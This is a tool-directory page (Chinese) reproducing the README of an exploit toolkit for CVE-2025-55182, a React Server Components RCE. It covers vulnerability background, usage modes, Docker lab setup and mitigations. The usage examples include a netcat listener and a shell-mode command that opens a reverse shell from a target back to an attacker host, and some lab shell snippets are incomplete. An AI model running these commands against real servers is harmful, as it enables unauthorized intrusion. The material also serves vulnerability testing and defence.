Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — 一个简单的工具包,用于验证、利用并通过 react2Shell Next.js RCE 获取交互式 shell。 | Kitploit
工具/GitHubGitHub/j4ck3lsyn-gen2/cve-2025-55182
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育远程访问工具Payload 开发
GitHubj4ck3lsyn-gen2/cve-2025-55182

CVE-2025-55182

一个简单的工具包,用于验证、利用并通过 react2Shell Next.js RCE 获取交互式 shell。

查看仓库
116个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182: React2Shell - Next.js 远程代码执行工具包

CVE-2025-55182 CVSS License

[!WARNING] 此工具仅用于授权测试和教育目的。未经授权的网络访问和数据窃取是非法的。使用此工具前,用户须确保拥有相应的授权。

概述

本仓库包含一个简易工具包,用于验证、利用 CVE-2025-55182(又名 React2Shell)并获得交互式 shell。这是一个关键的预认证远程代码执行 (RCE) 漏洞,存在于 React Server Components (RSC) 中,影响版本 19.0.0、19.1.0、19.1.1 和 19.2.0。

该漏洞源于 React Flight 协议中的不安全反序列化,允许未经身份验证的攻击者在易受攻击的服务器上执行任意代码。该漏洞于 2025 年 12 月 3 日披露,CVSS 评分为 10.0(严重)。它主要影响 React Server Components,但对使用 RSC 的框架(如 Next.js)也有影响。

注意: 此工具包仅用于教育和研究目的。未经授权利用漏洞是非法且不道德的。请负责任地使用,仅在你拥有或拥有明确测试权限的系统上使用。

受影响的组件

  • React Server Components:版本 19.0.0、19.1.0、19.1.1、19.2.0
  • 相关框架:Next.js(在某些上下文中可能通过 CVE-2025-66478 受影响)
  • 利用向量:RSC 负载中的不安全反序列化,可在无需身份验证的情况下实现 RCE。

有关更多详情,请参阅官方公告:

  • NVD CVE-2025-55182
  • React 安全公告
  • Wiz 关于 React2Shell 的博客

用法


功能

  • 验证:检查目标是否易受 CVE-2025-55182 攻击。
  • 利用:构造负载以执行任意命令。
  • 交互式 Shell:获得反向 shell 以实现持久访问。
  • 支持 Python 3.x,依赖极少。

要求

  • Python 3.8+
  • 所需库:requests、argparse(通过 pip install -r requirements.txt 安装)

安装

Venv 安装

  1. 拉取仓库
git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
cd CVE-2025-55182
  1. 虚拟环境
python3 -m venv CVE202555182Venv
python3 -m pip install -r requirements.txt
  1. 激活
source CVE202555182Venv/bin/activate[.fish]

本地安装

  1. 克隆仓库:
    git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. 安装依赖:
    pip install -r requirements.txt
    

用法

主脚本是 sploit.py。使用以下选项运行:

python sploit.py --help

选项

  • --target <URL>:目标 URL(例如 http://vulnerable-site.com)。
  • --mode <validate|sploit|shell>:操作模式。
    • validate:检查漏洞而不进行利用。
    • sploit:执行自定义命令。
    • shell:建立交互式反向 shell。
  • --command <CMD>:要执行的命令(sploit 模式必需)。
  • --lhost <IP>:反向 shell 的本地主机(shell 模式必需)。
  • --lport <PORT>:反向 shell 的本地端口(默认:4444)。

示例

  1. 验证漏洞:

    python sploit.py --target http://example.com --mode validate
    
  2. 利用并执行命令:

    python sploit.py --target http://example.com --mode sploit --command "whoami"
    
  3. 获得交互式 Shell: 首先设置监听器(例如 nc -lvnp 4444),然后:

    python sploit.py --target http://example.com --mode shell --lhost 192.168.1.100 --lport 4444
    

工作原理

  1. 漏洞检测:发送特制的 RSC 负载以检测反序列化缺陷。
  2. 负载构造:利用不安全反序列化通过 React 的 Flight 协议注入代码。
  3. Shell 访问:通过执行一个回连到攻击者机器的负载,升级为反向 shell。

技术深入阅读:

  • Datadog 安全实验室分析
  • Dynatrace 博客

执行示例


Docker 安装


{
  "dependencies": {
    "next": "14.3.0-canary.77",
    "react": "19.0.0",
    "react-dom": "19.0.0"
  },
  "scripts": {
    "dev": "next dev",
    "build": "next build",
    "start": "next start"
  }
}

完全删除 tsconfig.json(这是破坏构建的关键)


rm tsconfig.json

创建最低要求的 App Router 文件


mkdir -p app

# app/layout.tsx
cat > app/layout.tsx << 'EOF'
import "./globals.css";

export default function RootLayout({
  children,
}: {
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body>{children}</body>
    </html>
  );
}

app/globals.css(可以基本为空)

echo "/* minimal css - required by Next.js */" > app/globals.css

app/page.tsx(你的真实漏洞页面放在这里 - 示例存根)

cat > app/page.tsx << 'EOF'
export default function Home() {
  return (
    <main>
      <h1>react2shell 实验室运行中!</h1>
      <p>开始利用 → /api/vulnerable-endpoint</p>
    </main>
  );
}

创建最终的防弹 Dockerfile(确切内容)


FROM node:20-alpine

WORKDIR /app

# 仅复制包文件(更好的缓存)
COPY package*.json ./

# 使用旧版对等依赖项安装依赖(此旧版 canary 需要)
RUN npm install --legacy-peer-deps

# 复制应用其余部分
COPY . .

# 删除 tsconfig.json 以免 Next.js 尝试自动安装 TypeScript(这是杀手锏)
RUN rm -f tsconfig.json

# 构建 Next.js 应用
RUN npm run build

# 暴露端口
EXPOSE 3000

# 启动应用
CMD ["npm", "start"]

构建并运行(这些命令现在完美工作)


docker build -t react2shell .
docker run -d -p 3000:3000 --name react2shell react2shell

在浏览器中打开

→ http://localhost:3000你已完成。容器在 <2 秒内启动,并准备好进行原型污染 → RCE 链。可选一行命令以随时销毁并重启:bash

docker rm -f react2shell && docker run -d -p 3000:3000 --name react2shell react2shell

缓解措施

  • 将 React 更新至 19.2.1 或更高版本。
  • 如果不需要,禁用或限制 React Server Components。
  • 监控利用尝试,因为已观察到国家支持的行为者(例如中国关联团体)迅速针对该 CVE。

参见 AWS 安全博客 获取威胁情报。

免责声明

此工具按“原样”提供,不附带任何担保。作者不对因使用本工具包造成的任何误用或损害负责。在测试漏洞之前,务必获得许可。

贡献

欢迎拉取请求!如需重大更改,请先开启 issue。

许可证

本项目根据 MIT 许可证授权 - 参见 LICENSE 文件了解详情。

参考文献

  • Cisco 公告
  • Palo Alto Unit 42 报告
  • CMU ISO 新闻
  • Cloudflare 博客
  • Huntress 博客
  • JFrog 博客
  • Elastic Security
Your Image Badge
下载工具